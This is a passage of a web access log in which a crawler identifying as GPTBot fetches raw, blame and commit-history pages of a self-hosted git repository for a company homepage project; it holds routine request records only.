[Length 9865] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/.gitignore" +[17/Feb/2026:13:08:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/.gitignore" [Client 74.7.227.38] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/.gitignore" +[17/Feb/2026:13:08:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/types.ts" [Client 74.7.227.38] [Length 10780] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/types.ts" +[17/Feb/2026:13:08:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.tsx" [Client 74.7.227.38] [Length 9865] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.tsx" +[17/Feb/2026:13:08:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.tsx" [Client 74.7.227.38] [Length 10828] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.tsx" +[17/Feb/2026:13:08:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/tsconfig.json" [Client 74.7.227.38] [Length 11187] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/tsconfig.json" +[17/Feb/2026:13:08:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/metadata.json" [Client 74.7.227.38] [Length 10354] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/metadata.json" +[17/Feb/2026:13:08:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/.gitignore" [Client 74.7.227.38] [Length 10730] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/.gitignore" +[17/Feb/2026:13:08:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/vite.config.ts" [Client 74.7.227.38] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/vite.config.ts" +[17/Feb/2026:13:08:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/vite.config.ts" [Client 74.7.227.38] [Length 11210] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/vite.config.ts" +[17/Feb/2026:13:08:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/types.ts" [Client 74.7.227.38] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/types.ts" +[17/Feb/2026:13:08:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.tsx" [Client 74.7.227.38] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.tsx" +[17/Feb/2026:13:08:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/package.json" [Client 74.7.227.38] [Length 10954] [Gzip 4.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/package.json" +[17/Feb/2026:13:08:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/metadata.json" [Client 74.7.227.38] [Length 9872] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/metadata.json" +[17/Feb/2026:13:08:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/package.json" [Client 74.7.227.38] [Length 9865] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/package.json" +[17/Feb/2026:13:08:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/tsconfig.json" [Client 74.7.227.38] [Length 9867] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/tsconfig.json" +[17/Feb/2026:13:08:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/types.ts" [Client 74.7.227.38] [Length 9873] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/types.ts" +[17/Feb/2026:13:08:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/tsconfig.json" [Client 74.7.227.38] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/tsconfig.json" +[17/Feb/2026:13:08:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/metadata.json" [Client 74.7.227.38] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/metadata.json" +[17/Feb/2026:13:08:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/README.md" [Client 74.7.227.38] [Length 9870] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/README.md" +[17/Feb/2026:13:08:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/vite.config.ts" [Client 74.7.227.38] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/vite.config.ts" +[17/Feb/2026:13:08:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/package.json" [Client 74.7.227.38] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/package.json" +[17/Feb/2026:13:08:30 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html" +[17/Feb/2026:13:08:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/README.md" [Client 74.7.227.38] [Length 10954] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/README.md" +[17/Feb/2026:13:08:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html" [Client 74.7.227.38] [Length 10808] [Gzip 4.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html" +[17/Feb/2026:13:08:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/App.tsx" [Client 74.7.227.38] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/App.tsx" +[17/Feb/2026:13:08:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/App.tsx" [Client 74.7.227.38] [Length 12447] [Gzip 5.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/App.tsx" +[17/Feb/2026:13:08:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/App.tsx" [Client 74.7.227.38] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/App.tsx" +[17/Feb/2026:13:08:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/App.tsx" [Client 74.7.227.38] [Length 12745] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html" +[17/Feb/2026:13:08:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/README.md" [Client 74.7.227.38] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/README.md" +[17/Feb/2026:13:08:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/package.json" [Client 74.7.227.38] [Length 11667] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html" +[17/Feb/2026:13:08:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.gitignore" [Client 74.7.227.38] [Length 10939] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.gitignore" +[17/Feb/2026:13:08:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/nginx.conf" [Client 74.7.227.38] [Length 11932] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/nginx.conf" +[17/Feb/2026:13:08:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 35536] [Gzip 11.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js/i18n.js" +[17/Feb/2026:13:08:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 10867] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images" +[17/Feb/2026:13:08:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/App.tsx" [Client 74.7.227.38] [Length 12446] [Gzip 5.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/App.tsx" +[17/Feb/2026:13:08:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/App.tsx" [Client 74.7.227.38] [Length 12444] [Gzip 5.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/App.tsx" +[17/Feb/2026:13:08:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/App.tsx" [Client 74.7.227.38] [Length 12444] [Gzip 5.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/App.tsx" +[17/Feb/2026:13:08:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426" [Client 74.7.227.38] [Length 14237] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9374d883a61b35708b6c621337a654b11bcdb426" +[17/Feb/2026:13:08:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/App.tsx" [Client 74.7.227.38] [Length 12448] [Gzip 5.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/App.tsx" +[17/Feb/2026:13:08:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/App.tsx" [Client 74.7.227.38] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/App.tsx" +[17/Feb/2026:13:08:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/package.json" [Client 74.7.227.38] [Length 9864] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/package.json" +[17/Feb/2026:13:08:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/package.json" [Client 74.7.227.38] [Length 10952] [Gzip 4.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/package.json" +[17/Feb/2026:13:08:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/nginx.conf" [Client 74.7.227.38] [Length 10120] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/nginx.conf" +[17/Feb/2026:13:08:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.gitignore" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.gitignore" +[17/Feb/2026:13:08:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 9904] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png" +[17/Feb/2026:13:08:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.gitignore" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.gitignore" +[17/Feb/2026:13:08:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.gitignore" [Client 74.7.227.38] [Length 28] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.gitignore" +[17/Feb/2026:13:08:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/nginx.conf" [Client 74.7.227.38] [Length 11820] [Gzip 4.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/nginx.conf" +[17/Feb/2026:13:08:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/package.json" [Client 74.7.227.38] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/package.json" +[17/Feb/2026:13:08:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/nginx.conf" [Client 74.7.227.38] [Length 796] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/nginx.conf" +[17/Feb/2026:13:08:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 2525271] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png" +[17/Feb/2026:13:08:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 9881] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/ChatBot.tsx" +[17/Feb/2026:13:08:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/App.tsx" [Client 74.7.227.38] [Length 12740] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" +[17/Feb/2026:13:08:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/README.md" [Client 74.7.227.38] [Length 11307] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html" +[17/Feb/2026:13:08:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode" [Client 74.7.227.38] [Length 10087] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 